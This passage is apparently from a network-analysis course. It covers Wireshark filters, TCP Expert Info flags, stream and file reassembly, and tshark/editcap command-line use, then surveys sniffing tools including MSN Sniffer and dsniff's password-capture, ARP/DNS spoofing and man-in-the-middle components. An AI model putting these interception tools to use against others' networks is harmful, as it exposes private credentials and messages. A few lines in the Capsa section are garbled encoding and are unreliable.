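    if direction == "A<->B":               # TCP/UDP tab: addresses and ports
        return (f"ip.addr=={addr_a} && {tab}.port=={port_a} && "
                f"ip.addr=={addr_b} && {tab}.port=={port_b}")
    (sa, sp), (da, dp) = (((addr_a, port_a), (addr_b, port_b)) if direction == "A->B"
                          else ((addr_b, port_b), (addr_a, port_a)))
    return f"ip.src=={sa} && {tab}.srcport=={sp} && ip.dst=={da} && {tab}.dstport=={dp}"


if __name__ == "__main__":
    for key, row in top_talkers(conversations(PACKETS, "ipv4")):
        print(key[1][0], "<->", key[2][0], row["bytes"], "bytes,",
              row["packets"], "packets, duration", row["duration"], "s")
    key = ("tcp", ("164.44.222.46", 80), ("24.6.173.220", 19943))
    print(conversation_filter(key, "A->B"))
```

On the sample, the IPv4 top talker is the 164.44.222.46 / 24.6.173.220 pair (5017 bytes, most of it flowing from the server), and its TCP conversation has a Duration of 2.5 s because the server's last segment arrived late; the DNS exchange only appears on the IPv4 and UDP tabs, never on the TCP tab.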
• Decipher the protocol hierarchy percentages

The Protocol Hierarchy window (Statistics | Protocol Hierarchy) shows each protocol as a percentage of the packets in the trace, nested under the protocol that carries it. In the example, 75.13% of the packets were TCP, but only 23.14% of the packets were associated with an application-layer protocol above TCP. What were the remaining 51.99% of TCP packets? They were pure TCP: handshake packets, acknowledgments and the connection teardown process. To display these packets on their own, use a filter that excludes every application protocol seen over TCP in the trace, for example:

tcp && !http && !db-lsp && !ssl

[Screenshot: an IO graph of a live capture with two filtered lines, Graph 2 for traffic to or from 207.236.215.136 and Graph 3 for traffic to or from 24.6.173.220, drawn over the Graph 1 line for all traffic.]
• Expert Info and "Unreassembled" warnings

Open the Expert Info window (Analyze | Expert Info, or click the Expert Info indicator at the left of the status bar) and look at the Warnings tab. If you see many "Unreassembled" warnings for a protocol, TCP reassembly is probably turned off. Enable it with Edit | Preferences | Protocols | TCP | Allow subdissector to reassemble TCP streams.

[Screenshot: the Expert Info tabs Errors, Warnings, Notes, Chats, Details and Packet Comments, each with the count for the current trace.]

With TCP reassembly enabled, reopening the Expert Info window shows the remaining items grouped by Group, Protocol and Summary with a Count for each, as in the following figure.

[Screenshot: the Expert Info window after reassembly is enabled, with columns Group, Protocol, Summary and Count.]
• Filter on TCP analysis flag packets

Wireshark marks packets that show signs of TCP trouble with analysis flags. To display all of them, use the filter tcp.analysis.flags; if you expand the TCP section of such a packet, the [SEQ/ACK analysis] branch explains why it was flagged. Window updates are flagged too, but they are not a problem (they are informational "chats"), so to see only the packets that point at trouble, use:

tcp.analysis.flags && !tcp.analysis.window_update

• Overview of the Expert Infos categories

Wireshark's Expert Info system watches for network problems, but it does not tell you what caused them; that is your job. It sorts what it finds into errors, warnings, notes and chats (from most to least severe), and knowing what each item means helps you judge whether it affects performance. The following sections describe the TCP-related items.
• Packet loss, recovery, and faulty trace files

Before you blame the network for packet loss, determine whether packets were really lost on the wire or are only missing from the trace file. If the capture method itself dropped packets (for example an oversubscribed spanned switch port), the loss indications are misleading.

• Previous Segment Not Captured (Warnings)

Wireshark did not see the expected sequence number in a TCP conversation: a segment that should have arrived before the current one is missing. Wireshark notices the gap by comparing the sequence number of the current segment with the sequence number plus length of the previous segment. Packet loss usually happens at a congested device such as a switch or router, and the missing segment is normally retransmitted later. When you see this warning with no retransmission following it, suspect the capture itself.

• ACKed Lost Packet (Warnings)

Wireshark saw an acknowledgment for data it never saw. The receiver got the data, so it was not lost on the network; it is missing from the trace file. A spanned switch port that could not keep up is a common cause, and such a trace file cannot be trusted for analyzing loss.

• Duplicate ACK (Notes)

The receiver noticed a missing segment and keeps acknowledging the last byte it received in order, asking for the missing segment again; each repeated ACK is a duplicate ACK. After three duplicate ACKs the sender should retransmit the missing segment (fast recovery). Duplicate ACKs are a symptom of loss that happened upstream of the receiver, not a problem in themselves.

• Retransmission (Notes)

A segment was retransmitted because its acknowledgment did not arrive before the sender's retransmission timeout (RTO) expired. This is part of packet loss recovery; the loss itself happened between the sender and the receiver (usually at a switch or router).

• Fast Retransmission (Notes)

Wireshark marks a segment as a fast retransmission when it is sent within 20 ms of a duplicate ACK for the same sequence number and the sender has seen more than one duplicate ACK. It is a faster form of loss recovery than waiting for the RTO to expire, but the underlying loss happened at the same place, between the sender and the receiver.

• Asynchronous or multiple path indications

Asynchronous paths mean that packets in one direction take a different route from packets in the other direction. That is not a problem in itself, but the path you analyze in one direction tells you nothing about the other direction.

Multiple path indications occur when the packets of a single conversation are split across several links and arrive in a different order from the one in which they were sent. Out-of-order packets are the main symptom.

• Out-of-Order (Warnings)

Wireshark flags a segment as out-of-order when its sequence number is lower than that of the previous segment in the stream but the data is new, which usually means the segment was delayed on a different path. Out-of-order packets are harmless on their own; they only hurt when the receiver waits long enough to send duplicate ACKs, which trigger unnecessary retransmissions.

• Keep-Alive indication

TCP keep-alive is a feature of the TCP stack used to verify that an idle connection is still alive and to keep it from being dropped by a device that times out idle connections (such as a firewall or NAT gateway). Keep-alives and their ACKs are normal traffic, not errors.

• Keep-Alive (Warnings)

A keep-alive is a segment with no data (or one byte) that carries the sequence number of the last acknowledged byte minus one, sent by one peer to check that the other peer is still there. If the other peer does not answer with a Keep-Alive ACK, the connection is dropped. Keep-alives are sent on idle connections and are not a problem in themselves; look at the time between the keep-alive and its ACK as you would at any other TCP round trip.

• Keep-Alive ACK (Notes)

The peer's response to a keep-alive. Again, not a problem on its own.

• Receive buffer congestion indications

Each side of a TCP connection advertises, in the window size field, how much space remains in its receive buffer. If the advertised window shrinks to zero, the application is not reading data out of the buffer fast enough; the sender must stop sending until space is available again, and that stall is a delay in the conversation.

• Window Full (Notes)

The sender has sent enough data to fill the receiver's advertised window and must stop until the receiver acknowledges data or advertises more space. The flag is set on the sender's packet; the receiver often follows with a zero window.

• Zero Window (Warnings)

A packet with a TCP window size value of 0 announces that the receiver has no buffer space left: the application on the receiving host is not pulling the data out of the TCP receive buffer. The other side of the connection must wait until the window opens again. Zero windows point at the receiving host (an overloaded host, or a process that is waiting on something such as a user prompt), not at the network.

• Zero Window Probe (Notes)

After receiving a zero window, the sender periodically sends a probe (one byte of data) to ask whether buffer space has become available. The probe is part of the zero window recovery process.

• Zero Window Probe ACK (Notes)

The receiver's response to a zero window probe. If the window size is still zero, the sender keeps waiting; if it is non-zero, the sender resumes.

• Window Update (Chats)

A window update tells the other side that more receive buffer space is available than in the previous packet. It is normal in TCP conversations and is also the recovery step after a zero window condition.

• TCP connection port reuse indication

A TCP connection normally ends with a FIN exchange or a Reset (TCP RST). If a new connection reuses the same source and destination addresses and ports before the previous one has been completely closed, Wireshark flags the reuse.

• Reused Ports (Notes)

Wireshark saw a new SYN with the same address and port pairs as an earlier conversation in the trace. This is usually harmless, but if the previous connection was not closed cleanly, the new connection may be reset or confuse devices that still track the old one.
• Possible Router Problem Indication: raised when packets appear to have taken longer than expected to cross the path; test the router before assuming a host problem.
• 4 NOPs in a Row (Warnings): NOP (No Operation, 0x01) is used in the TCP options area to pad options to a 4-byte boundary. Four NOPs in a row is unusual and usually means a device along the path has rewritten the options.
• Misconfiguration or ARP Poisoning Indication: Expert raises this when the traffic pattern suggests an incorrect network configuration or ARP poisoning.
• Duplicate IP Address Configured (Warnings): Wireshark sees two different MAC addresses claiming the same IP address in ARP traffic. This may be a genuine misconfiguration (a duplicate static address, or a dynamic address handed to a second host) or a sign of ARP poisoning.
• The Expert Infos window lists all such notes and warnings found in the trace.

Graph TCP Analysis Flags: the tcp.analysis.flags filter matches every packet that Wireshark has flagged with a TCP analysis note (retransmissions, duplicate ACKs, receiver congestion and so on), so graphing it in the IO Graph shows where the problems cluster in time. Window updates are also flagged, but they signal recovery (the receiver's buffer has freed up) rather than trouble, so they should be left out. In the IO Graph, Graph 1 plots all traffic and Graph 2 plots the filter (tcp.analysis.flags && !tcp.analysis.window_update), drawn as a bar graph so the problem packets stand out against the total.







• Graph Separate Types of TCP Analysis Flag Packets: in the IO Graph, give each TCP analysis flag type its own graph line (duplicate ACKs, retransmissions and so on) so the different problem types can be compared and the ones that delay the transfer identified.
Reassemble Traffic For Faster Analysis

Following a stream reassembles the data exchanged in a conversation, so the content (a web page, a transferred file, a binary object such as a medical DICOM image) can be examined without reading it packet by packet. Wireshark offers four ways to do this:
[Screenshot: Wireshark packet list (HTTP and TCP packets between 24.6.173.220 and the web server; Frame 77, source port 35529, destination port http (80)) with the packet right-click menu open, showing Follow TCP Stream, Follow UDP Stream and Follow SSL Stream.]
1. File | Export Objects | [HTTP | DICOM | SMB]
2. Follow TCP Stream (applies a TCP stream filter)
3. Follow UDP Stream (applies a filter on the UDP port numbers and IP addresses)
4. Follow SSL Stream (applies a filter on the SSL port number and IP addresses)

Reassemble Web Browsing Sessions

Wireshark can reassemble HTTP conversations so that a browsing session can be read as it happened.

• Follow TCP Stream: select any packet of the HTTP conversation and choose Follow TCP Stream. Wireshark builds the conversation filter from the MAC, IPv4/IPv6 and UDP/TCP port addressing of that packet. In the example, the trace is opened, the HTTP GET request in packet 10 is selected, Follow TCP Stream is chosen, and the stream is shown with the client's request and the server's response in different colours:


GET /
Host: www.wireshark.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

200 OK
Server: Apache/2
Vary: Accept-Encoding
X-Slogan: [unreadable in the screenshot]
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 20 Oct 2012 23:37:20 GMT
Transfer-Encoding: chunked
ETag: [unreadable in the screenshot]
Connection: Keep-Alive
Set-Cookie: [unreadable in the screenshot]
Last-Modified: Tue, 02 Oct 2012 19:32:12 GMT
Wireshark applies the filter tcp.stream eq 0 while the stream is displayed. The TCP Stream index starts at 0, so this is the first TCP stream in the trace; Wireshark numbers every TCP stream in the file in this way.

• Use Find, Save, and Filter on a Stream: the Follow Stream window offers several options once a stream is shown. Find searches the reassembled stream for a string. Save As writes the stream content to a file, which is how a transferred file is carved out of the trace. Filter Out This Stream applies the exclusion filter !(tcp.stream eq 0) so the remaining traffic can be examined.



Reassemble a File Transferred via FTP

FTP communications use two connections: a Command channel and a Data channel. The Data channel is set up with its own TCP handshake and carries nothing but the file content.

To reassemble a transferred file, use Follow TCP Stream on the Data channel: the resulting stream is the file itself, and it can be written out with Save As.

The Data channel is found by looking for the packets that follow a RETR (download) or STOR (upload) command on the Command channel. Wireshark labels the data packets "FTP-DATA"; in active mode the data connection is opened from server port 20, separate from the command connection (port 21).

Select any FTP-DATA packet and choose Follow TCP Stream, as shown in the figure below.
[Screenshot: Wireshark packet list showing the FTP command channel (Request: RETR /pub/wireshark/prerelease/Wireshark 1..., Response: 150 Opening BINARY mode data connection for ...) followed by FTP-DATA packets of 1460 bytes each and the TCP ACKs, with the right-click menu open on Follow TCP Stream.]
Following the command channel stream shows the RETR or STOR command together with the name of the transferred file:



220 (vsFTPd 2.0.x)   [version digits unreadable in the screenshot]
USER anonymous
331 Please specify the password.
PASS anypwd
230 Login successful.
PORT 192,168,0,101,206,177
200 PORT command successful. Consider using PASV.
NLST
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 192,168,0,101,206,178
200 PORT command successful. Consider using PASV.
RETR pantheon.jpg
150 Opening BINARY mode data connection for pantheon.jpg (14612 bytes).
226 File send OK.
QUIT
221 Goodbye.
When the file type is not obvious from the command channel, look at the first bytes of the saved stream: file formats announce themselves with a signature. JPEG files carry the "JFIF" marker, and PNG files begin with 0x89 50 4E 47. A tool such as TRIDnet (http://mark0.net/soft-tridnet-e.html) identifies a file from these signatures.
Export HTTP Objects Transferred in a Web Browsing Session

HTTP traffic carries many objects: html pages, graphics, JavaScript, videos, style sheet objects and so on. Wireshark can export them from the trace.

• TCP Preference: the TCP preference "Allow subdissector to reassemble TCP streams" must be enabled first. Without TCP reassembly Wireshark cannot rebuild the HTTP objects, and the export list stays incomplete.

• View all HTTP Objects in the Trace File: open a trace containing HTTP traffic and choose File | Export Objects | HTTP. Wireshark lists every HTTP object in the trace. In the figure below, the HTTP Object List for a browsing session to www.espn.com shows how many objects a single page load brings in.



[Screenshot: Wireshark HTTP object list window for the www.espn.com session, with the columns Packet num, Hostname, Content Type, Bytes and Filename, and the Save and Save All buttons.]
The HTTP object list window shows the following for each object:
• Packet num: the number of the first packet of the object in the trace.
• Hostname: the value of the http.host field taken from the GET request for the object.
• Content Type: the type of the object, such as images (.gif, .jpg, .png), scripts (.js) and media (.swf or .flv).
• Bytes: the size of the object.
• Filename: the part of the requested URL after the last "/" (for example index.html).

Use Save All to write every object to a directory; this is a quick way to inspect everything a browsing session pulled from the HTTP servers.

Not every extension is self-explanatory (.css, for instance, is a Cascading Style Sheet); a reference such as http://www.fileinfo.com/help/file extension can be consulted for the file types that appear in the list.
Use Command-Line Tools to Capture, Split, And Merge Traffic

Wireshark ships with command-line tools that handle the jobs the GUI is poor at: capturing on a busy link without the overhead of dissection, cutting a huge trace into pieces that open in reasonable time, and merging several captures into one. The key commands are:
• EDITCAP

editcap -h: View Editcap parameters. 

editcap -i 360 big.pcapng 360secs.pcapng: Split big.pcapng into separate 360secs*.pcapng files with up to 
360 seconds of traffic in each file. 

editcap -c 500 big.pcapng 500pkts.pcapng: Split big.pcapng into separate 500pkts*.pcapng files with up 
to 500 packets in each file. 

• MERGECAP 

mergecap -h: View Mergecap parameters. 

mergecap files*.pcapng -w merged.pcapng: Merge files*.pcapng into a single file called merged.pcapng 
(merge based on packet timestamps). 

mergecap a.pcapng b.pcapng -w ab.pcapng -a: Merge a.pcapng and b.pcapng into a single file called 
ab.pcapng (merge based on the order files are listed). 

• TSHARK 

tshark -h: View Tshark parameters. 

tshark -D: List the available capture interfaces that can be used with the -i parameter. 

tshark -i2 -f "tcp" -w tcp.pcapng: Capture only TCP-based traffic on interface 2 and save it to tcp.pcapng.

tshark -i1 -R "ip.addr==10.2.1.1": Capture all traffic on interface 1, but only display traffic to or from 10.2.1.1.

tshark -r "myfile.pcapng" -R "http.host contains \".ru\"" -w myfile-ru.pcapng: Open a trace file called myfile.pcapng, apply a display filter for the value ".ru" in the HTTP host field, and save the results to a file called myfile-ru.pcapng.

Wireshark struggles with very large trace files: a trace of more than about 100 MB takes a long time to load and makes every filter and graph slow. The remedy is to split the capture into a File Set, a series of files that share a stem name and carry a sequence number and a timestamp, which Wireshark can step through as one capture.

• Add the Wireshark program directory to your path: editcap.exe and the other command-line tools live in the Wireshark program folder (Help | About Wireshark | Folders shows where it is). Adding that folder to the system path lets editcap run from any directory. Run editcap -h to see all options; the two used here split a file by packet count (-c option) or by seconds of capture time (-i option).

• Use Capinfos to Get the File Size and Packet Count: Capinfos is a command-line tool that reports basic information about a trace file. Run capinfos <filename>; the output includes the file type and encapsulation, the number of packets, the file and data size, the capture duration, start and end time, data rates, the average packet size and rate, file hashes, and whether the packets are in strict time order.
[Screenshot: capinfos http-disney101.pcapng. Readable fields: File name http-disney101.pcapng; File type Wireshark - pcapng; File encapsulation Ethernet; Packet size limit: file hdr: (not set); File size 6364504 bytes; Start time Wed Oct 24 15:01:11 2012; Data byte rate 254144.72 bytes/sec; Data bit rate 2033157.76 bits/sec; Strict time order: True. The number of packets, data size, duration, end time, average packet size and rate, and the SHA1/RIPEMD160/MD5 hashes are unreadable in the screenshot.]
• Split a File Based on Packets per Trace File: in the following example, editcap -c 1000 a.pcapng a1000set.pcapng splits a.pcapng into a set of files (a1000set*.pcapng) holding 1,000 packets each, the last one carrying whatever remains.



[Screenshot: editcap -c 1000 a.pcapng a1000set.pcapng followed by dir a1000set*.*, listing nine files a1000set_00000_20110707163900.pcapng through a1000set_00008_20110707163921.pcapng; the first eight are roughly 0.7 to 1.1 MB each and the last one 33,924 bytes.]

• Split a File Based on Seconds per Trace File: in the next example, editcap -i 360 b.pcapng b360set.pcapng splits b.pcapng into a set of files (b360set*.pcapng) each covering 360 seconds of capture time. Wireshark does not care how many packets land in each file: a file covers 360 seconds, so a quiet interval gives a small file and a busy one a large file. Here editcap split b.pcapng into 15 files, numbered 00000 to 00014.



[Screenshot: dir b360set*.* listing 15 files, b360set_00000 through b360set_00014, each name ending in a timestamp, with sizes ranging from about 90 KB to 1.5 MB.]

• Open and Work with File Sets in Wireshark: open any file of the set with File | Open, then use File | File Set | List Files to see the whole set and move between its files. In the figure, the set of nine files from the earlier split is listed; clicking an entry opens that file.
Merge Multiple Trace Files

Several trace files can be merged into one, for example to put traffic captured at several points on a single IO Graph. Mergecap, the tool that merges trace files, is installed in the Wireshark program directory (Help | About Wireshark | Folders | Program).

• Run Mergecap with the -w parameter: mergecap -h lists all options. The output file is given with -w. By default the files are merged in packet timestamp order; with the -a parameter they are instead concatenated in the order listed on the command line. In the example below, the three files whose names start with c30set are merged into c.pcapng.



[Screenshot: dir c30set*.* lists the three c30set files; mergecap -w c.pcapng c30set*.* merges them, and dir c.pcapng shows the single merged file.]

Capture Traffic at Command Line

Traffic can be captured from the command line with dumpcap.exe or tshark.exe instead of the Wireshark GUI.

• Dumpcap or Tshark: Dumpcap is the actual capture engine; Tshark calls dumpcap to capture and adds the ability to apply display filters and produce statistics after the capture (post-capture). Dumpcap alone is the lighter choice for long or high-rate captures because it does no dissection; when the traffic has to be analysed at capture time, use Tshark. Both save in the .pcapng format by default, and both live in the Wireshark program directory (Help | About Wireshark | Folders | Program). The first thing to do with either tool is to list the capture interfaces.

• Capture at the Command Line with Dumpcap: run dumpcap -h for the full list of parameters. dumpcap -D lists the capture interfaces, as in the figure below; the interface number shown there is the value to pass with the -i parameter.


[Screenshot: dumpcap -D output listing \\.\airpcap00, \\.\airpcap_any and \\.\airpcap01 (AirPcap USB wireless capture adapters) and a \Device\NPF_{...} Realtek adapter.]
To capture 2,000 packets and write them to smallcap.pcapng, use dumpcap -c 2000 -w smallcap.pcapng.

The -a parameter stops the capture automatically on a condition: duration:N (in seconds) or filesize:N (in KB). For example, dumpcap -i1 -a filesize:1000 -w 1000kb.pcapng captures on interface 1 and stops when the file reaches 1000 KB.



[Screenshot: dumpcap -i1 -a filesize:1000 -w 1000kb.pcapng; Capturing on \Device\NPF_{...}; File: 1000kb.pcapng; Packets captured: 1153; Packets received/dropped on interface: 1153/0.]

• Capture at the Command Line with Tshark: Tshark captures much like dumpcap (tshark -c 100 -w 100.pcapng saves 100 packets to 100.pcapng), since it uses dumpcap as its capture engine, but it also offers the analysis options. Use tshark -h to list all parameters and tshark -D to list the capture interfaces, exactly as with dumpcap. Where Tshark differs from dumpcap is in what it can do with a trace: in the example below, Tshark reads port80.pcapng, keeps only the packets to or from one IP address and writes them to myport80.pcapng.



[Screenshot: tshark -r port80.pcapng -R "ip.addr==24.6.17x.xxx" (last digits unreadable) -w myport80.pcapng, followed by dir *port80.pcapng listing port80.pcapng and myport80.pcapng.]

Use Capture Filters during Command-Line Capture

Both dumpcap and Tshark accept capture filters with the -f parameter, using the same BPF (Berkeley Packet Filter) syntax as the GUI. For example, to capture only traffic to or from TCP port 21 on interface 1, run dumpcap -i1 -f "tcp port 21" -w port21.pcapng, as in the figure below. The capture runs until it is stopped with Ctrl+C.



[Screenshot: dumpcap -i1 -f "tcp port 21" -w "port21.pcapng"; Capturing on \Device\NPF_{...}; File: port21.pcapng; Packets: 102.]

Tshark takes the same filter parameters. In the next example, the capture is limited to TCP port 21 traffic to or from 24.6.173.220 and saved to myport21.pcapng, using -i, -f and -w:

tshark -i1 -f "tcp port 21 and host 24.6.173.220" -w myport21.pcapng
[Screenshot: tshark -i1 -f "tcp port 21 and host 24.6.173.220" -w "myport21.pcapng"; Capturing on Realtek PCIe FE Family Controller.]
Quotes matter: a capture filter that contains spaces must be enclosed in quotes, as in the example above.
Use Display Filters during Command-Line Capture

Tshark can also apply display filters, in the GUI's display filter syntax, with the -R parameter.

Take care with this parameter when writing a file set: the display filter is applied to every file of the set.

If only the packets that Wireshark flags with TCP analysis problems are wanted, filter on tcp.analysis.flags. In the example below, TCP traffic is first captured to tcptraffic.pcapng; Tshark then reads that file, applies the display filter tcp.analysis.flags and writes the matching packets to analysisflags.pcapng. This is a two-step process.



[Screenshot: tshark -i4 -f "tcp" -w tcptraffic.pcapng (Capturing on Realtek PCIe FE Family Controller), then tshark -r "tcptraffic.pcapng" -R "tcp.analysis.flags" -w analysisflags.pcapng, and dir analysisflags.pcapng showing the much smaller output file.]
Tshark can also export fields from packets and produce statistics directly, which makes it a handy way to feed other tools. Use tshark -h to list the parameters; the following sections show the field-export and statistics options.

• Export Field Values: use -T fields to print field values instead of packet summaries, and -e to name each field to print. The command

tshark -i1 -f "dst port 80 and host 24.6.173.220" -T fields -e frame.number -e ip.src -e ip.dst -e tcp.window_size

captures traffic from 24.6.173.220 to port 80 on interface 1 and prints, for each packet, the frame number, the source and destination IP address and the TCP window size.

The capture runs until it is stopped with Ctrl+C; the output in the figure below lists the four fields for each captured packet.



[Screenshot: the tshark -T fields command above, printing one line per packet with the frame number, source 24.6.173.220, destination 174.137.42.75 or 205.251.215.133, and window sizes such as 8192 and 65700.]
Add -E header=y to print a header line with the field names, and -E separator=, to separate the fields with commas so the output imports cleanly into a spreadsheet or database. Redirect the output to a file with >, for example > stats.txt.

• Export Traffic Statistics: Tshark generates statistics with the -z parameter. In the example below, tshark -qz io,phs prints the protocol hierarchy statistics (phs) of the captured traffic; -q suppresses the per-packet output.



[Screenshot: tshark -qz io,phs (Capturing on Realtek PCIe FE Family Controller, 15367 packets captured) printing the Protocol Hierarchy Statistics tree: frame, eth, arp, ipv6 (icmpv6, udp, dhcpv6), ip (udp with snmp, bootp, dns, db-lsp-disc; tcp with http, data-text-lines, tcp.segments, image-gif, media, data, ssl, ftp, ftp-data, db-lsp), each with its frame and byte counts.]
To keep the statistics, redirect them to a file: tshark -qz io,phs > stats.txt. Other statistics are produced the same way; tshark -qz hosts, for example, lists the host names resolved during the capture with their IP addresses.



[Screenshot: tshark -qz hosts output, a "TShark hosts output" list pairing IPv4 and IPv6 addresses with names such as sourceforge.net, googleapis.l.google.com, dart.l.doubleclick.net, googlehosted.l.googleusercontent.com, akamaiedge.net hosts and www.chappellu.com.]

To pull the Expert notes, warnings or chats out of a trace, use -z expert. In the example below, tshark -r "http-download101.pcapng" -qz expert,notes prints the expert notes, including the zero window entries that show where the download stalled. For the errors and warnings only, use -qz expert,warn instead.
[Screenshot: tshark -r "http-download101.pcapng" -qz expert,notes output. Warnings: TCP Previous segment not captured (common at capture start), TCP window is full, TCP Zero window, each in the Sequence group with its frequency. Notes: TCP Duplicate ACK (#1, #2 and higher), also in the Sequence group.]
The full list of -z statistics is in the tshark manual page: http://www.wireshark.org/docs/man-pages/tshark.html

• Export HTTP Host Field Values: the same -T fields technique lists every web site contacted during a capture. Capture with a display filter on http.host so that only packets carrying that field are kept, and export the field with -e http.host. The command in the figure below is tshark -i4 -R "http.host" -T fields -e http.host; the exported field name is the one given to -e.



[Screenshot: tshark -i4 -R "http.host" -T fields -e http.host; Capturing on Realtek PCIe FE Family Controller; packets captured.]

The output in the next figure was redirected to httphost.txt and lists the HTTP host names one per line. To know which server each request went to, add the destination IP address as a second field with -e ip.dst.



[Screenshot: httphost.txt opened in Notepad, listing host names such as i2.cdn.turner.com, ads.cnn.com and pagead2.googlesyndication.com.]

The trace files used in this chapter are available from http://www.wiresharkbook.com/; Wireshark itself is downloaded from http://www.wireshark.org/; additional Wireshark training material is at http://www.chappellu.com/. When building a display filter, use Wireshark's Filter Expression dialog to choose the field and the comparison, and save the filters you will reuse.
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Sniffing Tool: Tcpdump/Windump 



Tcpdump

Source: http://www.tcpdump.org

Tcpdump is a command-line packet analyzer that lets the user display the TCP/IP and other packets transmitted or received over the network the computer is attached to. It runs on most UNIX-like operating systems.

Windump

Source: http://www.winpcap.org

WinDump is the Windows version of Tcpdump. It is fully compatible with Tcpdump and can be used to watch, diagnose and save network traffic to disk according to complex rules; the difference is only that it runs on Windows.



TCPDump 

Runs on Linux and UNIX systems 



WinDump 

Runs on Windows systems 



[Screenshot: tcpdump output in a terminal (http://www.tcpdump.org) and WinDump output in a Windows command prompt (http://www.winpcap.org).]



Packet Sniffing Tool: Capsa Network Analyzer 



Source: http://www.colasoft.com

Capsa Network Analyzer is a network monitoring and analysis tool that captures the packets travelling on the network, analyzes them and displays statistics about them in real time. It can capture all of the traffic on the segment it is attached to, diagnose network problems and show which hosts and protocols are consuming the network, so it can also be used as a sniffing tool on the local network.

Features:
- Support for 802.11a/b/g/n wireless networks.
- Support for more than 300 network protocols, with statistics of network activity per protocol.
- Monitoring of network bandwidth (Network Bandwidth) and utilization, with capture of all traffic on the network.

_^^aJl oi^ (J ^a. CjU jIslxJI tila j (j^akla 
,<SjjaJl ~\ iklLujI CjUU jjjuafljj ialilill j^juj ^ilj U>* ;*D^a.lj 4 a ASjjoJI dlljjUaal ^jiajc 
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# a£jjuo3I (J^Lk ^j-<» ^yii ^j3I jj^>^ ^^>^j 

<^^j ^ Ij* cf^* ^j'-O^ f tciujiuli ^jUtj (j^aLkJ! wizard ^W-^ <J^-^> j^^-o^ ciuinj ^ j£j 

.aJUII aJL!£\ jj^i 



[Screenshot: Colasoft Capsa 7 Enterprise Demo start page. The adapter list (Microsoft, Wi-Fi 192.168.1.101, Local Area Connection, Ethernet) shows PPS, bps, speed, packets, bytes and utilization per adapter. The Analysis Profile is "Full Analysis" (comprehensive analysis of all application and network problems) with the modules MSN, Yahoo Messenger, ICQ, ARP, DNS, Email, FTP, HTTP and ICMPv4 loaded; no packet filter is applied and packet and log output are disabled. Other profiles: Traffic Monitor, Security Analysis, HTTP Analysis, Email Analysis, DNS Analysis, FTP Analysis, IM Analysis.]
From the start page choose the adapter to capture on, here Wi-Fi, and click Start to begin the capture.

After clicking Start the analysis window opens and shows the captured traffic through the views described below.



[Screenshot: Capsa "Analysis Project 1", Full Analysis. The Node Explorer lists Protocol Explorer (1), Physical Explorer (3) and IP Explorer (4). The Summary dashboard plots Total Traffic by Bytes over time (03:03:16 to 03:04:16), Top IP Total Traffic by Bytes and Top Application Protocols by Bytes. The status bar reads "Capture - Full Analysis, Wi-Fi, Inactive 00:01:26, 13,479 packets, Ready".]
https://www.facebook.com/tibea2004 



Dashboard: displays the traffic graphs and the top-talker charts shown above.
Summary: presents an overview of the statistics of the captured network traffic.
Diagnosis: lists the network and security problems detected in the traffic. In this capture, for example, the Transport Layer group reports TCP problems such as TCP Slow Response.



[Screenshot: Capsa Diagnosis view. The diagnosis tree lists Application Layer: HTTP Client Error; Transport Layer: TCP Repeated Connect, TCP Slow Response; Network Layer: IP Too Low TTL. The address table shows the local host 192.168.1.101 (MAC 00:16:EA:DA:B0:B8) and several Internet addresses all reached through the gateway MAC C0:4A:00:C6:A0:C0. The Events pane lists Transport-layer faults of the form "Repeated attempt to establish TCP connection (see packet N)" with the source IP of each.]
[Screenshot: Capsa "Details - Packets" pane for 192.168.1.101: a packet list with absolute time, source, destination, protocol (TCP and UDP), size and packet number (29,489 to 29,496); the decode of packet 29,496 (Ethernet Type II, destination C0:4A:00:C6:A0:C0, source 00:16:EA:DA:B0:B8 Intel Corporation, timestamp 2014/07/23 03:06:22.262888) with its hex dump; and the Events pane with further "Repeated attempt to establish TCP connection" faults. The status bar reads "Capture - Full Analysis, Wi-Fi, Inactive 00:03:35, 34,891 packets, Ready"; the Alarm Explorer shows 0 alarms.]
[Screenshots: the Capsa Protocol tab (TCP, HTTPS, HTTP, UDP, DNS and other protocols with bytes, packets and bps for each) and the Physical/IP Endpoint tab (Local Host 192.168.1.101 at 00:16:EA:DA:B0:B8 and the gateway C0:4A:00:C6:A0:C0, with bytes and packets sent and received).]
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Network Packet Analyzer: JitBit Network Sniffer 



Source: http://www.jitbit.com

JitBit Network Sniffer is a tool that captures the IP packets passing through the network interface card (NIC), decodes their IP headers and displays the captured contents.
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Chat Message Sniffer: MSN Sniffer 2 



Source: http://www.msnsniffer.com
MSN Sniffer 2 is a tool for monitoring and capturing MSN chat traffic. It records all MSN conversations taking place on the network and saves the captured messages in a chat history file, and it can show the MSN sessions of every local user.

[Screenshot: MSN Sniffer 2 window listing the captured conversations (local user joe210 with contacts GeorgeBlue and WiLMa) and the message log of a session with the MovieScout bot, with counters for MSN packets, local users, conversations and messages.]



Tcp/Ip Packet Crafter: Colasoft Packet Builder 



Source: http://www.colasoft.com

Colasoft Packet Builder is a network packet crafter used to create custom network packets for testing the network. It includes a decoding editor that lets you edit the packet fields, and it can build ARP, IP, TCP and UDP packets.



[Screenshot: Colasoft Packet Builder with its toolbar (Import, Export, Add, Insert, Copy) and the Decode Editor.]
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Network Sniffing Tools: dsniff 



Source: http://www.monkey.org/~dugsong/dsniff
Dsniff is a suite of network auditing tools built around password sniffing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g. because of layer-2 switching). sshmitm and webmitm implement active man-in-the-middle (MITM) attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

dsniff itself is a password sniffer that handles the following protocols: FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL.
dsniff automatically detects and minimally parses each application protocol, saving only the interesting bits, and uses Berkeley DB as its output file format, logging only unique authentication attempts. Full TCP/IP reassembly is provided by libnids.

